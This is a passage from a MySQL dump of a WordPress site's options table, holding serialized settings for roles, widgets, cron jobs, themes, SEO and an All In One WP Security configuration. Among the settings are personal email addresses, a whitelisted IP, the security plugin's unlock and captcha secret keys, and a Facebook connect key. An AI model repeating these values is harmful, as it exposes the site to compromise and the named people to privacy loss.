Manager\";s:12:\"capabilities\";a:38:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"view_site_health_checks\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(93,'widget_search','a:4:{i:2;a:1:{s:5:\"title\";s:0:\"\";}i:4;a:0:{}i:5;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_recent-posts','a:4:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}i:4;a:0:{}i:5;a:3:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-comments','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(96,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(98,'sidebars_widgets','a:9:{s:9:\"sidebar-1\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:10:\"archives-2\";i:3;s:12:\"categories-2\";}s:17:\"right-widget-area\";a:5:{i:0;s:8:\"search-4\";i:1;s:7:\"pages-3\";i:2;s:17:\"recent-comments-4\";i:3;s:14:\"recent-posts-4\";i:4;s:6:\"text-3\";}s:19:\"wp_inactive_widgets\";a:2:{i:0;s:6:\"meta-2\";i:1;s:14:\"recent-posts-2\";}s:7:\"sidebar\";a:5:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:12:\"categories-2\";i:3;s:7:\"pages-5\";i:4;s:6:\"text-5\";}s:8:\"footer_1\";a:1:{i:0;s:14:\"recent-posts-5\";}s:8:\"footer_2\";a:0:{}s:8:\"footer_3\";a:1:{i:0;s:10:\"calendar-2\";}s:8:\"footer_4\";a:2:{i:0;s:10:\"nav_menu-3\";i:1;s:8:\"search-5\";}s:13:\"array_version\";i:3;}','yes'),(99,'widget_pages','a:3:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}i:5;a:0:{}}','yes'),(100,'widget_calendar','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_nav_menu','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(103,'cron','a:21:{i:1675212723;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675212787;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675212792;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675213371;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675217857;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675245625;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675245883;a:2:{s:13:\"wpseo-reindex\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:31:\"wpseo_permalink_structure_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675249250;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675253670;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675255977;a:1:{s:26:\"wordfence_daily_autoUpdate\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675255992;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675257487;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675260171;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675260489;a:1:{s:29:\"wpo_smush_clear_backup_images\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675261083;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675264551;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675266247;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675346890;a:1:{s:21:\"wpo_weekly_cron_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1675677883;a:1:{s:16:\"wpseo_ryte_fetch\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1675784647;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(133,'theme_mods_twentysixteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1480429104;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(134,'current_theme','Vega','yes'),(135,'theme_mods_aqueduct','a:2:{i:0;b:0;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1480433278;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:10:\"archives-2\";i:3;s:12:\"categories-2\";}s:8:\"footer-1\";N;}}}','yes'),(136,'theme_switched','','yes'),(141,'recently_activated','a:1:{s:23:\"wp-cerber/wp-cerber.php\";i:1631882683;}','yes'),(142,'aiowpsec_db_version','1.9','yes'),(143,'aio_wp_security_configs','a:92:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:1:\"1\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";i:3;s:24:\"aiowps_retry_time_period\";i:5;s:26:\"aiowps_lockout_time_length\";i:60000000000000000;s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:1:\"1\";s:20:\"aiowps_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:1:\"1\";s:32:\"aiowps_unlock_request_secret_key\";s:20:\"ix47uq4w7ird04kkkwxt\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:14:\"185.175.113.72\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"0i5ptdpzoqw7wabrxnq0\";s:42:\"aiowps_enable_manual_registration_approval\";s:1:\"1\";s:39:\"aiowps_enable_registration_page_captcha\";s:1:\"1\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:1:\"1\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:1:\"1\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:2:{i:0;s:5:\"admin\";i:1;s:13:\"housing-today\";}s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:1:\"1\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(144,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.4.1\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1480432573;s:7:\"version\";s:3:\"4.5\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(145,'spam_captcha_options','a:7:{s:12:\"contactform7\";b:0;s:16:\"hash_sha1_plugin\";s:40:\"ccb524225ee208fba3b2bc7cf7be90296d1bb965\";s:11:\"captcha_css\";s:43:\".captcha_image {\n \n}\n.captcha_comment {\n \n}\";s:14:\"captcha_enable\";b:0;s:14:\"akismet_enable\";b:0;s:14:\"flush_nb_jours\";i:30;s:15:\"flush_max_entry\";i:10000;}','yes'),(146,'plugin_error_on_activation','','yes'),(148,'wpmdr_css','/* Remove meta from post */\n.entry-meta {\ndisplay:none !important;\n}\n\n/* Remove meta from home page */\n.home .entry-meta { \ndisplay: none; \n}\n/* WPTheme 2015 Metadata Removal */\n.entry-footer {\ndisplay:none !important;\n}\n\n/* WPTheme 2015 Metadata Removal */\n.home .entry-footer { \ndisplay: none; \n}','yes'),(149,'wpmdr_disable_php','0','yes'),(150,'wpmdr_disable_css','0','yes'),(151,'wpseo','a:45:{s:8:\"tracking\";b:0;s:22:\"license_server_version\";b:0;s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:19:\"indexing_first_time\";b:1;s:16:\"indexing_started\";b:0;s:15:\"indexing_reason\";s:26:\"permalink_settings_changed\";s:29:\"indexables_indexing_completed\";b:0;s:7:\"version\";s:4:\"17.1\";s:16:\"previous_version\";s:4:\"16.9\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:1;s:17:\"ryte_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:0;s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:0;s:18:\"first_activated_on\";i:1479224199;s:13:\"myyoast-oauth\";b:0;s:26:\"semrush_integration_active\";b:1;s:14:\"semrush_tokens\";a:0:{}s:20:\"semrush_country_code\";s:2:\"us\";s:19:\"permalink_structure\";s:17:\"/blog/%postname%/\";s:8:\"home_url\";s:27:\"https://housing-today.co.uk\";s:18:\"dynamic_permalinks\";b:0;s:17:\"category_base_url\";s:0:\"\";s:12:\"tag_base_url\";s:0:\"\";s:21:\"custom_taxonomy_slugs\";a:0:{}s:29:\"enable_enhanced_slack_sharing\";b:1;s:25:\"zapier_integration_active\";b:0;s:19:\"zapier_subscription\";a:0:{}s:14:\"zapier_api_key\";s:0:\"\";s:23:\"enable_metabox_insights\";b:1;s:23:\"enable_link_suggestions\";b:1;s:26:\"algolia_integration_active\";b:0;}','yes'),(152,'wpseo_permalinks','a:9:{s:15:\"cleanpermalinks\";b:0;s:24:\"cleanpermalink-extravars\";s:0:\"\";s:29:\"cleanpermalink-googlecampaign\";b:0;s:31:\"cleanpermalink-googlesitesearch\";b:0;s:15:\"cleanreplytocom\";b:0;s:10:\"cleanslugs\";b:1;s:18:\"redirectattachment\";b:0;s:17:\"stripcategorybase\";b:0;s:13:\"trailingslash\";b:0;}','yes'),(153,'wpseo_titles','a:56:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:23:\"content-analysis-active\";b:1;s:23:\"keyword-analysis-active\";b:1;s:9:\"separator\";s:7:\"sc-dash\";s:5:\"noodp\";b:0;s:15:\"usemetakeywords\";b:0;s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:18:\"metakey-home-wpseo\";s:0:\"\";s:20:\"metakey-author-wpseo\";s:0:\"\";s:22:\"noindex-subpages-wpseo\";b:0;s:20:\"noindex-author-wpseo\";b:0;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"metakey-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:16:\"hideeditbox-post\";b:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"metakey-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:16:\"hideeditbox-page\";b:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"metakey-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:22:\"hideeditbox-attachment\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:20:\"metakey-tax-category\";s:0:\"\";s:24:\"hideeditbox-tax-category\";b:0;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:20:\"metakey-tax-post_tag\";s:0:\"\";s:24:\"hideeditbox-tax-post_tag\";b:0;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:23:\"metakey-tax-post_format\";s:0:\"\";s:27:\"hideeditbox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;}','yes'),(154,'wpseo_social','a:20:{s:9:\"fb_admins\";a:0:{}s:12:\"fbconnectkey\";s:32:\"022d1aae219c9884166cd864392571ab\";s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(155,'wpseo_rss','a:2:{s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";}','yes'),(156,'wpseo_internallinks','a:10:{s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:23:\"breadcrumbs-blog-remove\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"»\";s:23:\"post_types-post-maintax\";i:0;}','yes'),(157,'wpseo_xml','a:16:{s:22:\"disable_author_sitemap\";b:1;s:22:\"disable_author_noposts\";b:1;s:16:\"enablexmlsitemap\";b:1;s:16:\"entries-per-page\";i:1000;s:14:\"excluded-posts\";s:0:\"\";s:38:\"user_role-administrator-not_in_sitemap\";b:0;s:31:\"user_role-editor-not_in_sitemap\";b:0;s:31:\"user_role-author-not_in_sitemap\";b:0;s:36:\"user_role-contributor-not_in_sitemap\";b:0;s:35:\"user_role-subscriber-not_in_sitemap\";b:0;s:30:\"post_types-post-not_in_sitemap\";b:0;s:30:\"post_types-page-not_in_sitemap\";b:0;s:36:\"post_types-attachment-not_in_sitemap\";b:1;s:34:\"taxonomies-category-not_in_sitemap\";b:0;s:34:\"taxonomies-post_tag-not_in_sitemap\";b:0;s:37:\"taxonomies-post_format-not_in_sitemap\";b:0;}','yes'),(158,'wpseo_flush_rewrite','1','yes'),(162,'coreSLframework_options','a:1:{s:22:\"global_location_plugin\";a:4:{i:0;a:2:{i:0;s:9:\"*Standard\";i:1;s:3:\"std\";}i:1;a:2:{i:0;s:13:\"under Plugins\";i:1;s:7:\"plugins\";}i:2;a:2:{i:0;s:11:\"under Tools\";i:1;s:5:\"tools\";}i:3;a:2:{i:0;s:14:\"under Settings\";i:1;s:8:\"settings\";}}}','yes'),(163,'fw_active_extensions','a:6:{s:6:\"update\";a:0:{}s:13:\"github-update\";a:0:{}s:4:\"blog\";a:0:{}s:10:\"shortcodes\";a:0:{}s:13:\"wp-shortcodes\";a:0:{}s:7:\"builder\";a:0:{}}','yes'),(169,'wpseo_sitemap_1_cache_validator','XlUP','no'),(170,'wpseo_sitemap_page_cache_validator','51fEs','no'),(171,'wpseo_sitemap_revision_cache_validator','47lqc','no'),(177,'widget_columns_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(183,'wpseo_sitemap_attachment_cache_validator','XlVF','no'),(184,'wpseo_sitemap_cache_validator_global','3H2E','no'),(187,'wpseo_sitemap_post_cache_validator','51fET','no'),(190,'theme_mods_nirvana','a:8:{i:0;b:0;s:16:\"background_color\";s:6:\"383838\";s:16:\"background_image\";s:69:\"http://housing-today.co.uk/wp-content/uploads/2016/11/lost-places.jpg\";s:17:\"background_repeat\";s:6:\"repeat\";s:21:\"background_position_x\";s:6:\"center\";s:21:\"background_attachment\";s:6:\"scroll\";s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:6;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1480435590;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:10:\"archives-2\";i:3;s:12:\"categories-2\";}s:8:\"footer-1\";N;s:17:\"right-widget-area\";a:5:{i:0;s:8:\"search-4\";i:1;s:7:\"pages-3\";i:2;s:17:\"recent-comments-4\";i:3;s:14:\"recent-posts-4\";i:4;s:6:\"text-3\";}}}}','yes'),(191,'theme_switched_via_customizer','','yes'),(192,'wpseo_sitemap_category_cache_validator','47lpJ','no'),(203,'wpseo_sitemap_15_cache_validator','53TWF','no'),(225,'wpseo_sitemap_19_cache_validator','54PTo','no'),(256,'nav_menu_options','a:1:{s:8:\"auto_add\";a:0:{}}','yes'),(257,'wpseo_sitemap_nav_menu_cache_validator','4G86F','no'),(258,'wpseo_sitemap_nav_menu_item_cache_validator','4G86W','no'),(262,'theme_mods_vega','a:6:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:6:\"header\";i:6;}s:12:\"header_ima